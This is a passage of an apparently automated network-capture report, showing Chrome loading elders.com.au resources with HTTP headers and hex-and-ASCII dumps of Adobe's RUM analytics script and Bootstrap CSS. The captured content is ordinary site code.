                                                                                                                                                                                                            2024-11-06 05:29:42 UTC693INData Raw: 31 35 61 32 0d 0a 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 41 64 6f 62 65 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 74 6f 20 79 6f 75 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 59 6f 75 20 6d 61 79 20 6f 62 74 61 69 6e 20 61 20 63 6f 70 79 0a 20 2a 20 6f 66 20 74 68 65 20 4c 69 63 65 6e 73 65 20 61 74 20 68 74
                                                                                                                                                                                                            Data Ascii: 15a2/* * Copyright 2024 Adobe. All rights reserved. * This file is licensed to you under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. You may obtain a copy * of the License at ht
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 20 73 74 72 69 63 74 27 3b 0a 0a 20 20 2f 2a 20 65 73 6c 69 6e 74 2d 65 6e 76 20 62 72 6f 77 73 65 72 20 2a 2f 0a 20 20 66 75 6e 63 74 69 6f 6e 20 73 61 6d 70 6c 65 52 55 4d 28 63 68 65 63 6b 70 6f 69 6e 74 2c 20 64 61 74 61 29 20 7b 0a 20 20 20 20 2f 2f 20 65 73 6c 69 6e 74 2d 64 69 73 61 62 6c 65 2d 6e 65 78 74 2d 6c 69 6e 65 20 6d 61 78 2d 6c 65 6e 0a 20 20 20 20 63 6f 6e 73 74 20 74 69 6d 65 53 68 69 66 74 20 3d 20 28 29 20 3d 3e 20 28 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3f 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 20 3a 20 44 61 74 65 2e 6e 6f 77 28 29 20 2d 20 77 69 6e 64 6f 77 2e 68 6c 78 2e 72 75 6d 2e 66 69 72 73 74 52 65 61 64 54 69 6d 65 29 3b 0a 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: strict'; /* eslint-env browser */ function sampleRUM(checkpoint, data) { // eslint-disable-next-line max-len const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime); try {
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 20 20 20 20 20 20 2e 72 65 70 6c 61 63 65 28 2f 61 74 20 28 5b 5e 20 5d 2b 29 20 5c 28 28 2e 2b 29 5c 29 2f 2c 20 27 24 31 40 24 32 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 70 6c 61 63 65 28 2f 20 61 74 20 2f 2c 20 27 40 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 72 69 6d 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 20 2f 2a 20 65 72 72 6f 72 20 73 74 72 75 63 74 75 72 65 20 77 61 73 20 6e 6f 74 20 61 73 20 65 78 70 65 63 74 65 64 20 2a 2f 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 72 72 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e
                                                                                                                                                                                                            Data Ascii: .replace(/at ([^ ]+) \((.+)\)/, '$1@$2') .replace(/ at /, '@') .trim(); } catch (err) { /* error structure was not as expected */ } return errData; }; window.addEventListen
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 67 69 6e 20 7d 20 3d 20 6e 65 77 20 55 52 4c 28 60 2e 72 75 6d 2f 24 7b 77 65 69 67 68 74 7d 24 7b 75 72 6c 50 61 72 61 6d 73 7d 60 2c 20 73 61 6d 70 6c 65 52 55 4d 2e 63 6f 6c 6c 65 63 74 42 61 73 65 55 52 4c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 6f 64 79 20 3d 20 6f 72 69 67 69 6e 20 3d 3d 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 20 3f 20 6e 65 77 20 42 6c 6f 62 28 5b 72 75 6d 44 61 74 61 5d 2c 20 7b 20 74 79 70 65 3a 20 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 27 20 7d 29 20 3a 20 72 75 6d 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 75 72 6c 2c 20 62 6f 64 79 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20
                                                                                                                                                                                                            Data Ascii: gin } = new URL(`.rum/${weight}${urlParams}`, sampleRUM.collectBaseURL); const body = origin === window.location.origin ? new Blob([rumData], { type: 'application/json' }) : rumData; navigator.sendBeacon(url, body); //
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC746INData Raw: 7b 20 63 68 65 63 6b 70 6f 69 6e 74 2c 20 64 61 74 61 20 7d 20 7d 29 29 3b 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 6f 72 29 20 7b 0a 20 20 20 20 20 20 2f 2f 20 73 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 61 77 72 79 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 74 72 79 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 73 63 72 69 70 74 53 72 63 20 3d 20 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 29 0a 20 20 20 20 20 20 3f 20 6e 65 77 20 55 52 4c 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 2e 6f 72 69 67 69 6e 20 3a 20 6e 75 6c 6c 3b
                                                                                                                                                                                                            Data Ascii: { checkpoint, data } })); } catch (error) { // something went awry } } try { const scriptSrc = (document.currentScript && document.currentScript.src) ? new URL(document.currentScript.src, window.location.origin).origin : null;
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            31192.168.2.457696162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC637OUTGET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC585INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Thu, 20 Jun 2024 09:07:06 GMT
                                                                                                                                                                                                            etag: W/"0-2386f26fb1bdc0"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 1516693
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210084-DFW
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1718968730.245109,VS0,VS0,VE2
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2affecb0f35a2-DFW


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            32192.168.2.457699162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC637OUTGET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-head.lc-60038e123df28ea326da7b93dfc6bc75-lc.min.css HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC606INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Wed, 23 Oct 2024 19:56:35 GMT
                                                                                                                                                                                                            etag: W/"4b89b-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-sjc10036-SJC
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1729713395.295648,VS0,VS0,VE709
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 223261
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2affeebd8e8fd-DFW
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC763INData Raw: 37 64 34 30 0d 0a 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 32 3b 2d 2d 62 73 2d 70 75 72 70 6c 65 3a 23 36 66 34 32 63 31 3b 2d 2d 62 73 2d 70 69 6e 6b 3a 23 64 36 33 33 38 34 3b 2d 2d 62 73 2d 72 65 64 3a 23 64 63 33 35 34 35 3b 2d 2d 62 73 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 62 73 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 62 73 2d 67 72 65 65 6e 3a 23 31 39 38 37 35 34 3b 2d 2d 62 73 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 62 73 2d 63 79 61 6e 3a 23 30 64 63 61 66 30 3b 2d 2d 62 73 2d 77 68 69 74 65 3a 23 66 66 66 3b 2d 2d 62 73 2d 67 72 61 79 3a 23 36 63 37 35 37 64 3b 2d 2d 62 73 2d 67 72 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34
                                                                                                                                                                                                            Data Ascii: 7d40:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a4
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 2c 32 35 35 2c 32 35 35 2c 30 2e 31 35 29 2c 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 29 7d 0a 2a 2c 2a 3a 3a 62 65 66 6f 72 65 2c 2a 3a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 0a 40 6d 65 64 69 61 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 6e 6f 2d 70 72 65 66 65 72 65 6e 63 65 29 7b 3a 72 6f 6f 74 7b 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 73 6d 6f 6f 74 68 7d 0a 7d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 73 61 6e 73 2d 73 65 72 69 66 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e
                                                                                                                                                                                                            Data Ascii: ,255,255,0.15),rgba(255,255,255,0))}*,*::before,*::after{box-sizing:border-box}@media(prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}body{margin:0;font-family:var(--bs-font-sans-serif);font-size:1rem;font-weight:400;line-height:1.
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 72 65 6d 7d 0a 6f 6c 20 6f 6c 2c 75 6c 20 75 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 0a 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 0a 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 72 65 6d 7d 0a 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 0a 73 6d 61 6c 6c 2c 2e 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 0a 6d 61 72 6b 2c 2e 6d 61 72 6b 7b 70 61 64 64 69 6e 67 3a 2e 32 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 38 65 33 7d 0a 73 75 62 2c 73 75 70 7b 70 6f 73 69 74
                                                                                                                                                                                                            Data Ascii: rem}ol ol,ul ul,ol ul,ul ol{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}small,.small{font-size:.875em}mark,.mark{padding:.2em;background-color:#fcf8e3}sub,sup{posit
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 74 6c 69 6e 65 3a 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 20 61 75 74 6f 20 35 70 78 7d 0a 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 0a 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 0a 5b 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0a 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 0a 5b 6c 69 73 74 5d 3a 3a 2d 77 65 62 6b 69 74 2d
                                                                                                                                                                                                            Data Ascii: tline:-webkit-focus-ring-color auto 5px}input,button,select,optgroup,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,select{text-transform:none}[role="button"]{cursor:pointer}select{word-wrap:normal}[list]::-webkit-
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 75 74 74 6f 6e 7d 0a 6f 75 74 70 75 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 0a 69 66 72 61 6d 65 7b 62 6f 72 64 65 72 3a 30 7d 0a 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0a 70 72 6f 67 72 65 73 73 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 0a 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 0a 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 36 32 35 72 65 6d 20 2b 20 34 2e 35 76 77 29 3b 66 6f 6e 74 2d 77 65
                                                                                                                                                                                                            Data Ascii: utton}output{display:inline-block}iframe{border:0}summary{display:list-item;cursor:pointer}progress{vertical-align:baseline}[hidden]{display:none !important}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:calc(1.625rem + 4.5vw);font-we
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 0a 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 66 6f 6f 74 65 72 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 32 30 31 34 5c 30 30 41 30 22 7d 0a 2e 69 6d 67 2d 66 6c 75 69 64 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 0a 2e 69 6d 67 2d 74 68 75 6d 62 6e 61 69 6c 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a
                                                                                                                                                                                                            Data Ascii: in-bottom:1rem;font-size:.875em;color:#6c757d}.blockquote-footer::before{content:"\2014\00A0"}.img-fluid{max-width:100%;height:auto}.img-thumbnail{padding:.25rem;background-color:#fff;border:1px solid #dee2e6;border-radius:.25rem;max-width:100%;height:
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2f 20 32 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2f 20 32 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 29 7d 0a 2e 63 6f 6c 7b 66 6c 65 78 3a 31 20 30 20 30 7d 0a 2e 72 6f 77 2d 63 6f 6c 73 2d 61 75 74 6f 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 0a 2e 72 6f 77 2d 63 6f 6c 73 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 72 6f 77 2d 63 6f 6c 73 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 0a 2e
                                                                                                                                                                                                            Data Ascii: adding-right:calc(var(--bs-gutter-x) / 2);padding-left:calc(var(--bs-gutter-x) / 2);margin-top:var(--bs-gutter-y)}.col{flex:1 0 0}.row-cols-auto>*{flex:0 0 auto;width:auto}.row-cols-1>*{flex:0 0 auto;width:100%}.row-cols-2>*{flex:0 0 auto;width:50%}.
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 2e 35 72 65 6d 7d 0a 2e 67 2d 32 2c 2e 67 79 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 2e 35 72 65 6d 7d 0a 2e 67 2d 33 2c 2e 67 78 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 72 65 6d 7d 0a 2e 67 2d 33 2c 2e 67 79 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 72 65 6d 7d 0a 2e 67 2d 34 2c 2e 67 78 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 0a 2e 67 2d 34 2c 2e 67 79 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 0a 2e 67 2d 35 2c 2e 67 78 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 0a 2e 67 2d 35 2c 2e 67 79 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 0a 40 6d 65 64 69 61 28 6d 69
                                                                                                                                                                                                            Data Ascii: -2{--bs-gutter-x:.5rem}.g-2,.gy-2{--bs-gutter-y:.5rem}.g-3,.gx-3{--bs-gutter-x:1rem}.g-3,.gy-3{--bs-gutter-y:1rem}.g-4,.gx-4{--bs-gutter-x:1.5rem}.g-4,.gy-4{--bs-gutter-y:1.5rem}.g-5,.gx-5{--bs-gutter-x:3rem}.g-5,.gy-5{--bs-gutter-y:3rem}@media(mi
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 2e 33 33 33 33 33 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 37 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 37 25 7d 0a 2e 67 2d 73 6d 2d 30 2c 2e 67 78 2d 73 6d 2d 30 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 7d 0a 2e 67 2d 73 6d 2d 30 2c 2e 67 79 2d 73 6d 2d 30 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 7d 0a 2e 67 2d 73 6d 2d 31 2c 2e 67 78 2d 73 6d 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 2e 32 35 72 65 6d 7d
                                                                                                                                                                                                            Data Ascii: .33333%}.offset-sm-8{margin-left:66.66667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.33333%}.offset-sm-11{margin-left:91.66667%}.g-sm-0,.gx-sm-0{--bs-gutter-x:0}.g-sm-0,.gy-sm-0{--bs-gutter-y:0}.g-sm-1,.gx-sm-1{--bs-gutter-x:.25rem}
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 69 64 74 68 3a 38 33 2e 33 33 33 33 33 25 7d 0a 2e 63 6f 6c 2d 6d 64 2d 31 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 39 31 2e 36 36 36 36 37 25 7d 0a 2e 63 6f 6c 2d 6d 64 2d 31 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 2e 33 33 33 33 33 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 37 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33
                                                                                                                                                                                                            Data Ascii: idth:83.33333%}.col-md-11{flex:0 0 auto;width:91.66667%}.col-md-12{flex:0 0 auto;width:100%}.offset-md-0{margin-left:0}.offset-md-1{margin-left:8.33333%}.offset-md-2{margin-left:16.66667%}.offset-md-3{margin-left:25%}.offset-md-4{margin-left:33.333


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            33192.168.2.457698162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC623OUTGET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
